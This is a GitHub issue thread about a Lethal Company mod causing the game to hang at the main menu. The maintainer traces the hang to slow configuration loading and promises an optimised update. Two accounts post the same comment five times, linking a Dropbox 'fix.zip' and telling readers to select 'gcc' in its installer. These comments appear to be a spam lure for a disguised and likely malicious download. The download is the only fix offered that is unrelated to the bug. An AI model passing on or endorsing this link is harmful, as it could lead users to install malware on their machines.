### ISSUE TITLE
[BUG] Cannot Launch Game to Main Menu

### ISSUE THREAD

**Issue by immahuntu** [TheAnsuz/Lethal-Company-Configurable-Company-API#57]
## **Bug Description**
- The bug I am having is with **Lethal Company Variables**. 
- I can launch the game with the mods enabled, however, I cannot get to the main screen where we can play. The most it does is let me chose whether I want to play Online or LAN, then it goes black, and nothing works — clicking anywhere makes Lethal Company no longer respond and waiting does not fix this; game becomes unplayable. 
- Unfortunately, as we are doing a modded playthrough with a lot of friends, we found that most interiors don't seem to have a lot of loot inside, and as such we needed this mod. 

## **Issue Reproduction**
1. Create a modpack with my mods on Thunderstore Mod Manager — a link to my modpack is [here](https://thunderstore.io/c/lethal-company/p/KrsnaCallisto/Kikiis_Core_Plus_Cosmetics_v60/), in case you would like to check if there are any potential incompatibilities or issues. 
2. Launch game and select `Online` — this issue should now be replicated. 
- I have attempted some basic troubleshooting such as force restarting everything; this did not work. 
- I also attempted to see if this issue was one-off or if it kept re-occurring, and so far it has been repeating three times, and even on 2 different devices I have used for testing myself, as well as some of my friend's configurations; so I do not believe that the issue is hardware related — from looking at the BepInEx Log Output files ([see here](https://github.com/user-attachments/assets/afff2fac-994e-4c11-b892-6b3b1380cc8b), it does seem like the mod is doing something in the background and working; it just seems like it stops responding. 

## **Relevant Mods & Profile**
The **Profile Code** is `01918bd8-75e9-41e4-de1d-63a1a17fd540`
- `Game Version v62`
- `Configurable Company v3.5.0` — note that launching this works usually, it's only the Lethal Company Variables that causes the above issue. 
- `Lethal Company Variables v2.5.2`

## **Extra Information**
After launching game and selecting `Online`
![image](https://github.com/user-attachments/assets/d72e1353-7b81-408d-9003-0e6d67dbe7ef)

BepInEx Log Output File
![image](https://github.com/user-attachments/assets/49c5faf8-eb23-4b25-8bb2-f05e7d2a23d6)

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by TheAnsuz** [comment]
Hello @immahuntu 

I will look into the issue as soon as posible, in the meantime you might want to isolate any mos that could be conflicting to help solve the issue faster.

Thanks for your time!

**Comment by TheAnsuz** [comment]
Hello @immahuntu 

I've tried to use your mod and it seems like it just takes a long time to load the main menu.

To be clear, I tested without the **deprecated** mods. I also noticed that while it appears that LCV is doing something, the logs before the screen goes black while loading are from LCV finishing loading it stuff so there might be other mods affecting the load of the game.

I will give it a look to optimize LCV but seems like the issue is not very much related to LCV loading.

**Comment by TheAnsuz** [comment]
I want to add that this seems to be an issue with lethal config having to generate to much configurations.

**Comment by KrsnaCallisto** [comment]
> I've tried to use your mod and it seems like it just takes a long time to load the main menu.
> 
> To be clear, I tested without the **deprecated** mods. I also noticed that while it appears that LCV is doing something, the logs before the screen goes black while loading are from LCV finishing loading it stuff so there might be other mods affecting the load of the game.
> 
> I will give it a look to optimize LCV but seems like the issue is not very much related to LCV loading.

Hi there, sorry I forgot to reply to this and to let you know that we had figured out that it just took long to load. Whilst it might not be possible for optimize it further, I was wondering if you could make it somehow that the game does not stop responding when you click anywhere as this seemed to be an issue when we were playing with our friends, like having a loading screen or some form of feedback that things were working in the background and as expected.

**Comment by TheAnsuz** [comment]
Hello @immahuntu 

I also forgot to mention about updates. I have optimized the process for the loading and also made so the game won't stop responding while the menu loads. This update will come in a few days as I still need to verify that everything works correctly.

So basically all you want to be added will be added in a matter of days.

Thanks for your time and report!
